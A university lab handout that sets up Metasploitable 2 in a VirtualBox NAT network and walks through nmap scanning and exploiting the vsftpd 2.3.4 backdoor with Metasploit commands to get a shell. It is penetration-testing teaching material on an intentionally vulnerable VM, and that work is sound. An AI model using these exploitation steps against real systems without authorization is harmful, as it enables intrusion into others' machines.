ICS Lab

TASK 9

Introduction to operations on Metasploit framework and Scripting for penetration

Aim: To use Metasploit framework to perform reconnaissance and penetration testing

The metasploit framework can be enabled by the command ‘msfconsole’ in the kali linux
terminal (preferably in the root mode)

Installing Metasploitable 2 in VirtualBox

Metasploitable 2 is an intentionally vulnerable version of Ubuntu designed for testing

1. Download Metasploitable 2

2. Setting up Metasploitable 2 in VirtualBox

3. Connecting the Metasploitable 2 to NAT Network

4. Start the Metasploitable 2 Virtual Machine

Step 1:

After Downloading, extract the files from the metasploitable 2 zip folder and find the .vmdk
extension which has to be imported into the virtual machine.

Step 2:

Open Oracle VM VirtualBox Manager

● Go to Machine. Click the New button to create a new Virtual Machine.

● Set the following details.

○ Name: Metasploitable 2

○ Type: Linux.

○ Version: Ubuntu (64-Bit)

Click Next to Proceed

Allocate the memory size (preferably 1024 mb)

Select the radio button which says “Use an existing virtual hard drive file”

Click on the folder icon on the right side

Click on Add and select the .vmdk file in your extracted folder.
 ICS Lab

Click on Create to continue.

● The Virtual Machine of the Victim - Metasploitable 2 is successfully created.

Step 3:

In the Oracle VM virtual box, go to the File Preference Network

Click Add new NAT network  Edit selected NAT network

Rename the Network as your preference , for e.g. “ Network N” and change the Network
CIDR to the ip range as your preference, for e.g. 192.168.10.0/24 and then click OK

Now we need to connect the Kali linux and Metasploitable 2 to this NAT Network N

Select the appropriate Virtual Machine—in this case, Metasploitable 2 —

and then right-click on it to select the Settings option.

● The Settings window would appear.

● Click on the Network icon on the left-hand side and change the “Attached to” drop-down
box from NAT to NAT Network in Adapter 1 and click on OK

Similarly repeat the Process for Kali linux also

Now both are connected to the NAT Network “Network N”

Step 4:

Now, Start Both the machines in the Virtual Box

In case of Metaspolitable 2- the default username and password is msfadmin and msfadmin,
and for kali linux you can use root login

Sanity checks are performed to evaluate whether the installations are working properly and
the required configurations are in place.

1. Connectivity between Kali Linux & Metasploitable 2 Virtual Machine.

Now, type the command ‘ifconfig’ in the terminal of kali linux

Now, type the command ‘ifconfig’ in the terminal of Metasploitable 2

Note down the ip addresses of both, for e.g. 192.168.10.4 for kali linux and 192.168.10.5 for
metasploitable 2

To check the connectivity between two machines use the ‘ping’ command. e.g. ping
192.168.10.5 from the kali linux machine to get reply from the metasploitable 2 machine and
vice versa
 ICS Lab

Exploiting the Metasploitable 2 machine through metasploit in kali linux:

In this process the aim is to find a vulnerable point in the metasploitable 2 machine from the
metasploit in kali linux and use that point as an backdoor entry to gain complete access to the
metasploitable 2 machine.

Now, from kali linux metasploit terminal use nmap to find the services and their versions in
the metasploitablle 2 machine

“nmap –sV 192.168.10.5”

-s stands for services

V stands for its version and

192.168.10.5 is the ip address of metasploitable 2 machine

Now, it will show a list of ports which are open, closed and restricted, along with their
services and the versions.

This information is enough to find a vulnerable point to do the exploitation.

In this case we have a vulnerable point in ‘port 21 tcp’ which is ‘open’ and the service under
it is ‘ftp’ which’s version is ‘vsftpd 2.3.4’

Now, we have to exploit this vulnerability using the following commands

msf6 > search vsftpd 2.3.4

It will give a list of possible exploits in the module ranking from 0 to n

In this case, we have only one exploit with rank 0.

Now we can gain more information about this exploit by the command

‘info 0’ or ‘info exploit/unix/ftp/vsftpd_234_backdoor’

Now, keeping this info, we are going to use this exploit by the command

‘use 0’ or ‘use exploit/unix/ftp/vsftpd_234_backdoor’

After this, we will be redirected to the path of the exploit

Now, we have to use the command ‘set RHOSTS 192.168.10.5’

Where RHOSTS is the information we have gathered from info command and 192.168.10.5
is the ip address of metasploitable 2

After this, we have to set the payloads. For that, we need to know the payload information,
Use the command ‘show payload’ to obtain payload information.

After obtaining the payload information type the command ‘set payload/cmd/unix/interact’

Now after setting RHOSTS and Payloads we have to use the ‘run’ command.

Now, we can see that we have entered/ gained access to the metasploitable 2 machine from
kali linux machine through metasploit. To confirm it, type the command ‘ifconfig’ in the msf
and we can see the ip address of metasploitable 2 which is 192.168.10.5 which signifies that
we have gained access to that machine through the vulnerable point that we have analysed.

RESULT:

Thus the metasploit framework is used for analysing vulnerability and it has been assessed.